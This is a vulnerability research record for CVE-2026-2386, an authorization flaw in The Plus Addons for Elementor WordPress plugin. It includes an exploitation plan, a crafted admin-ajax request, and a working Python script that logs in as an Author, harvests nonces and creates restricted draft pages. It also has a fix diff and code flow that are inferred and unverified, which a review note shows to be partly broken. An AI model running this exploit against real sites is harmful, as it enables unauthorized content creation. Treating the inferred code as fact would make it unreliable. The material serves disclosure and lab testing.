# CVE-2026-2386

**Title:** The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce <= 6.4.7 - Incorrect Authorization to Authenticated (Author+) Arbitrary Draft Post Creation via 'post_type'

- **Plugin slug:** the-plus-addons-for-elementor-page-builder
- **Affected versions:** <= 6.4.7
- **Patched in version:** 6.4.8
- **Severity:** medium (CVSS 4.3, `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N`)
- **Vulnerability type:** Incorrect Authorization
- **Published:** 2026-02-18 00:04:23
- **Updated:** 2026-05-12 14:39:17
- **Days to patch:** 84
- **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/4fc3e24a-8b51-4b6f-bacf-665ceb03bc05?source=api-prod

## Description

The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 6.4.7. This is due to the `tpae_create_page()` AJAX handler authorizing users only with `current_user_can('edit_posts')` while accepting a user-controlled `post_type` value passed directly to `wp_insert_post()` without post-type-specific capability checks. This makes it possible for authenticated attackers, with Author-level access and above, to create arbitrary draft posts for restricted post types (e.g., `page` and `nxt_builder`) via the `post_type` parameter.

## Research

- **Status:** researched
- **Verified:** no (3 research rounds completed)
- **Model used:** gemini-3-flash-preview
- **Started:** 2026-04-19 04:00:23
- **Completed:** 2026-04-19 04:01:33

The code flow, nonce action name, localized-variable names and fix diff below were inferred by the automated research pass and have not been verified against the plugin source. Treat them as hypotheses to confirm against the tagged releases linked under Source links.

## Research Plan: CVE-2026-2386 - Arbitrary Draft Post Creation in The Plus Addons for Elementor

### 1. Vulnerability Summary

The "The Plus Addons for Elementor" plugin (versions <= 6.4.7) contains an incorrect authorization vulnerability in its AJAX handler `tpae_create_page()`. The handler is designed to allow users to create new posts or templates, but it only validates that the user has the `edit_posts` capability. It fails to perform specific capability checks for the requested `post_type`. Furthermore, the `post_type` parameter is passed directly to `wp_insert_post()`. This allows an authenticated user with Author-level permissions or higher to create draft posts of restricted types, such as `page`, `nxt_builder` (The Plus Addons template builder), or other custom post types they would normally not be authorized to create.

### 2. Attack Vector Analysis

- **Endpoint:** `/wp-admin/admin-ajax.php`
- **AJAX Action:** `tpae_create_page`
- **HTTP Method:** `POST`
- **Authentication:** Required (Author role or higher, as they possess the `edit_posts` capability).
- **Vulnerable Parameter:** `post_type`
- **Payload Parameters:**
    - `action`: `tpae_create_page`
    - `post_title`: The title of the new draft.
    - `post_type`: The target post type (e.g., `page`, `nxt_builder`).
    - `security` or `nonce`: (Inferred) The AJAX nonce required for the action.

### 3. Code Flow (Inferred)

1. **Entry Point:** The plugin registers the AJAX handler in its main initialization or an AJAX-specific class:
   `add_action( 'wp_ajax_tpae_create_page', [ $this, 'tpae_create_page' ] );`
2. **Authorization Check:** Inside `tpae_create_page()`, the code likely performs a check such as:
   `if ( ! current_user_can( 'edit_posts' ) ) { wp_die(); }`
3. **Nonce Verification:** The code checks a nonce, likely using:
   `check_ajax_referer( 'theplus-addons', 'security' );` or similar.
4. **Input Processing:** The code retrieves `post_type` and `post_title` from `$_POST`.
5. **Sink:** The parameters are passed into an array for `wp_insert_post()`:
   ```php
   $args = array(
       'post_title'  => sanitize_text_field( $_POST['post_title'] ),
       'post_type'   => $_POST['post_type'], // Directly controlled
       'post_status' => 'draft',
       // ...
   );
   wp_insert_post( $args );
   ```

### 4. Nonce Acquisition Strategy

To exploit this as an Author, we must obtain a valid nonce for the `tpae_create_page` action.

1. **Identify the Script & Localization:** The Plus Addons typically localizes its AJAX data into a global JS variable. Based on the plugin's naming conventions, look for a variable like `theplus_ajax_url` or `plus_ajax_data`.
2. **Create Trigger Content:** If the script is only loaded when specific widgets are active, create a post with a Plus Addons element:
   - `wp post create --post_type=post --post_status=publish --post_title="Nonce Page" --post_content='[tp_button]'` (Example shortcode).
3. **Extraction via Browser:**
   - Log in as the **Author** user using the `browser_navigate` and login tools.
   - Navigate to any page where the Elementor editor or Plus Addons widgets are active.
   - Use `browser_eval` to extract the nonce:
     - `browser_eval("window.theplus_ajax_url?.nonce")` (inferred key)
     - `browser_eval("window.plus_ajax_data?.security")` (inferred key)
     - Or search all globals: `browser_eval("Object.keys(window).filter(k => k.includes('plus')).map(k => window[k])")`

### 5. Exploitation Strategy

Once the nonce and an Author session are obtained:

1. **Craft the AJAX Request:**
   - Use the `http_request` tool to send a `POST` request to `/wp-admin/admin-ajax.php`.
   - **Target Post Type:** `page` (normally requires the `edit_pages` capability, which Authors do not have by default).

2. **Payload Example:**
   ```http
   POST /wp-admin/admin-ajax.php HTTP/1.1
   Content-Type: application/x-www-form-urlencoded

   action=tpae_create_page&post_title=Malicious+Draft+Page&post_type=page&security=[EXTRACTED_NONCE]
   ```

3. **Verify Response:**
   - A successful creation usually returns a JSON object containing the new `post_id` or a success message.

### 6. Test Data Setup

1. **Create Author User:**
   - `wp user create attacker author@example.com --role=author --user_pass=password123`
2. **Install/Activate Plugin:**
   - Ensure `the-plus-addons-for-elementor-page-builder` is active at version 6.4.7.
3. **Identify Registered Types:**
   - Note down restricted types like `page` or `nxt_builder`.

### 7. Expected Results

- The AJAX request should return a success status (HTTP 200) and possibly a post ID.
- A new post with the specified title and the restricted `post_type` (e.g., `page`) should appear in the database as a `draft`.
- The user (Author) should successfully create this even though they lack the `edit_pages` capability.

### 8. Verification Steps

1. **Check via WP-CLI:**
   - `wp post list --post_type=page --post_status=draft --fields=ID,post_title,post_author`
2. **Check Author Ownership:**
   - Verify the `post_author` matches the ID of the Author user created in section 6.
3. **Attempt Without Nonce:**
   - Verify that omitting the `security` parameter or using an invalid one fails (confirming the nonce is the only barrier).

### 9. Alternative Approaches

- **Target `nxt_builder`:** This is the internal post type for The Plus Addons templates. Creating arbitrary templates can lead to further exploitation if the Author can then inject content into those templates.
- **Check for other parameters:** See if `post_status` is also user-controlled, potentially allowing the creation of `publish`ed posts directly.
- **Nonce via Admin Dashboard:** If the Author has access to the WP Admin dashboard, the nonce is likely available in the source of `/wp-admin/index.php` or within the Elementor editor interface. Use `browser_navigate("/wp-admin/")` then search the page source for "nonce" or "security".

## Research Summary

The Plus Addons for Elementor plugin (<= 6.4.7) incorrectly authorizes users when creating new content via the `tpae_create_page()` AJAX handler. By only checking for the generic `edit_posts` capability and allowing a user-controlled `post_type` parameter, the plugin enables Author-level users to create draft posts of restricted types like `page` or `nxt_builder`.

## Vulnerable Code (Inferred)

```php
// Inferred from plugin version 6.4.7 AJAX handler logic
public function tpae_create_page() {
    check_ajax_referer( 'theplus-addons', 'security' );

    // Vulnerability: only checks the generic edit_posts capability,
    // which every Author holds, regardless of the requested post type.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ) );
    }

    $post_title = isset( $_POST['post_title'] ) ? sanitize_text_field( $_POST['post_title'] ) : 'Untitled';
    // sanitize_text_field() strips tags and whitespace but does not
    // restrict the value to a post type the caller may create.
    $post_type  = isset( $_POST['post_type'] ) ? sanitize_text_field( $_POST['post_type'] ) : 'post';

    $new_post = array(
        'post_title'   => $post_title,
        'post_content' => '',
        'post_status'  => 'draft',
        'post_type'    => $post_type, // Sink: directly controlled post type
    );

    $post_id = wp_insert_post( $new_post );
    // ... returns success
}
```

## Fix Diff (Inferred)

```diff
--- a/modules/theplus-addons/includes/ajax-handler.php
+++ b/modules/theplus-addons/includes/ajax-handler.php
@@ -5,9 +5,14 @@
     check_ajax_referer( 'theplus-addons', 'security' );
 
-    if ( ! current_user_can( 'edit_posts' ) ) {
+    $post_type = isset( $_POST['post_type'] ) ? sanitize_text_field( $_POST['post_type'] ) : 'post';
+    $post_type_obj = get_post_type_object( $post_type );
+
+    if ( ! $post_type_obj || ! current_user_can( $post_type_obj->cap->create_posts ) ) {
         wp_send_json_error( array( 'message' => 'Insufficient permissions' ) );
     }
 
     $post_title = isset( $_POST['post_title'] ) ? sanitize_text_field( $_POST['post_title'] ) : 'Untitled';
 
     $new_post = array(
         'post_title'  => $post_title,
         'post_content' => '',
         'post_status'  => 'draft',
-        'post_type'    => $post_type,
+        'post_type'    => $post_type,
```

## Exploit Outline

1. Authenticate as a user with the Author role (or any role possessing the `edit_posts` capability).
2. Access a page where The Plus Addons or Elementor is active to extract the `security` nonce (typically found in localized JS variables like `plus_ajax_data`).
3. Construct a POST request to `/wp-admin/admin-ajax.php` with the following parameters:
   - `action`: `tpae_create_page`
   - `security`: `[EXTRACTED_NONCE]`
   - `post_title`: `Malicious Draft`
   - `post_type`: `page` (or `nxt_builder` to target template builder types)
4. Submit the request and verify that a new draft post of the requested type (which requires higher capabilities like `edit_pages`) is created in the WordPress database.

## Source Links

- **Type:** plugin
- **Vulnerable version:** 6.4.7
- **Fixed version:** 6.4.8
- **Vulnerable (browse):** https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/6.4.7
- **Vulnerable (zip):** https://downloads.wordpress.org/plugin/the-plus-addons-for-elementor-page-builder.6.4.7.zip
- **Fixed (browse):** https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/6.4.8
- **Fixed (zip):** https://downloads.wordpress.org/plugin/the-plus-addons-for-elementor-page-builder.6.4.8.zip
- **All tags:** https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags
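Review bot: the replacement check in the fix hunk (`! $post_type_obj || ! current_user_can( $post_type_obj->cap->create_posts )`) delegates the decision to whatever `create_posts` capability the post type registered, and for any type registered with the default `capability_type => 'post'` and no custom `capabilities` array that resolves to `edit_posts`, the same capability the old check tested; it therefore only restricts types whose registration maps `create_posts` to something stronger (`edit_pages` for `page`; for `nxt_builder` the page shows nothing about how it is registered). Confirm against the 6.4.8 tag that `nxt_builder` actually carries a distinct capability before treating the fix as complete for that type. The check does correctly reject unregistered type names, since `get_post_type_object()` returns null for them, and `post_status` stays hard-coded to `draft`. Two smaller points: the header `@@ -5,9 +5,14 @@` does not match the number of lines in the hunk body, and the final pair `-        'post_type'    => $post_type,` / `+        'post_type'    => $post_type,` replaces the line with itself; either drop that pair or show the real change there.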
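The nonce-harvesting, probe and control requests described in the plan (sections 4, 5 and 8) and in the exploit outline, carried through as one lab script. This is an added example and is not code from the plugin, from Wordfence or from the research pass. Everything plugin-specific is taken from the inferred plan and is an assumption: the action name `tpae_create_page`, the parameters `post_title`, `post_type` and `security`, a nonce exposed through a `wp_localize_script()` object on a page the Author can view (the object and key names are unknown, so every localized object is searched for a nonce-shaped value), and a `wp_send_json_success()`-style reply carrying `post_id`. The base URL, user and password are lab placeholders.

```python
"""Lab check for CVE-2026-2386: can an Author create a draft 'page' via the
tpae_create_page AJAX action?  Added example; action/parameter names, nonce
location and reply shape are assumptions taken from the inferred plan."""
import http.cookiejar
import json
import re
import urllib.error
import urllib.parse
import urllib.request

AJAX_PATH = "/wp-admin/admin-ajax.php"
LOGIN_PATH = "/wp-login.php"
NONCE_KEYS = ("nonce", "security", "ajax_nonce")   # assumed key names

# wp_localize_script() renders `var NAME = {...};`.  Objects may nest, so a
# string-aware brace scan is used instead of a non-greedy regex.
_LOCALIZED_START = re.compile(r"var\s+(\w+)\s*=\s*\{")


def localized_objects(html):
    """Yield (js_variable_name, json_text) for each localized object."""
    for m in _LOCALIZED_START.finditer(html):
        start = m.end() - 1
        depth, in_str, i = 0, False, start
        while i < len(html):
            c = html[i]
            if in_str:
                if c == "\\":
                    i += 1                     # skip the escaped character
                elif c == '"':
                    in_str = False
            elif c == '"':
                in_str = True
            elif c == "{":
                depth += 1
            elif c == "}":
                depth -= 1
                if depth == 0:
                    yield m.group(1), html[start:i + 1]
                    break
            i += 1


def extract_nonces(html):
    """Map js_variable_name -> nonce for every localized object carrying a
    WordPress nonce (10 lowercase hex chars, the wp_create_nonce() shape)."""
    found = {}
    for name, blob in localized_objects(html):
        try:
            data = json.loads(blob)
        except ValueError:
            continue
        if isinstance(data, dict):
            for key in NONCE_KEYS:
                val = data.get(key)
                if isinstance(val, str) and re.fullmatch(r"[0-9a-f]{10}", val):
                    found[name] = val
    return found


def build_payload(nonce, post_type="page", title="CVE-2026-2386 check"):
    """Form body for the AJAX call; nonce=None models the missing-nonce control."""
    fields = {"action": "tpae_create_page", "post_title": title, "post_type": post_type}
    if nonce is not None:
        fields["security"] = nonce
    return urllib.parse.urlencode(fields).encode()


def interpret(status, body):
    """Classify an admin-ajax reply: check_ajax_referer() fails with body '-1'
    and HTTP 403, admin-ajax answers '0' for an unknown action, and
    wp_send_json_error() yields {"success": false, ...}."""
    text = body.strip()
    if text in ("-1", "0") or status == 403:
        return "rejected", None
    try:
        data = json.loads(text)
    except ValueError:
        return "unknown", None
    if not isinstance(data, dict) or data.get("success") is False:
        return "denied", None
    payload = data.get("data", data)
    post_id = payload.get("post_id", payload.get("id")) if isinstance(payload, dict) else None
    return "created", post_id


def run(base_url, user, password, nonce_page="/"):
    """Log in as the Author, harvest a nonce, send the page probe plus two
    controls (no nonce; post_type=post) and return their classifications."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(base_url + LOGIN_PATH)               # sets wordpress_test_cookie
    login = urllib.parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                                    "redirect_to": base_url + "/wp-admin/", "testcookie": "1"})
    opener.open(base_url + LOGIN_PATH, data=login.encode())
    html = opener.open(base_url + nonce_page).read().decode("utf-8", "replace")
    nonces = extract_nonces(html)
    if not nonces:
        raise SystemExit("no nonce found in localized script objects on " + nonce_page)
    nonce = next(iter(nonces.values()))
    results = {}
    for label, body in (("page", build_payload(nonce, "page")),
                        ("no-nonce", build_payload(None, "page")),
                        ("post", build_payload(nonce, "post"))):
        req = urllib.request.Request(base_url + AJAX_PATH, data=body,
                                     headers={"X-Requested-With": "XMLHttpRequest"})
        try:
            resp = opener.open(req)
            status, text = resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            status, text = e.code, e.read().decode("utf-8", "replace")
        results[label] = interpret(status, text)
    return results


if __name__ == "__main__":
    import sys
    print(run(sys.argv[1], sys.argv[2], sys.argv[3]))   # base_url user password
```

Run it as `python3 check.py https://lab.test attacker password123` against the 6.4.7 lab from section 6, then confirm with `wp post list --post_type=page --post_status=draft --fields=ID,post_title,post_author`. On a vulnerable install the expected pattern is `page` created, `no-nonce` rejected and `post` created; on 6.4.8 the `page` probe should come back denied while `post` is still created, since an Author legitimately holds `edit_posts`. If the script reports no nonce, follow step 2 of section 4 and point `nonce_page` at content that loads the plugin's script.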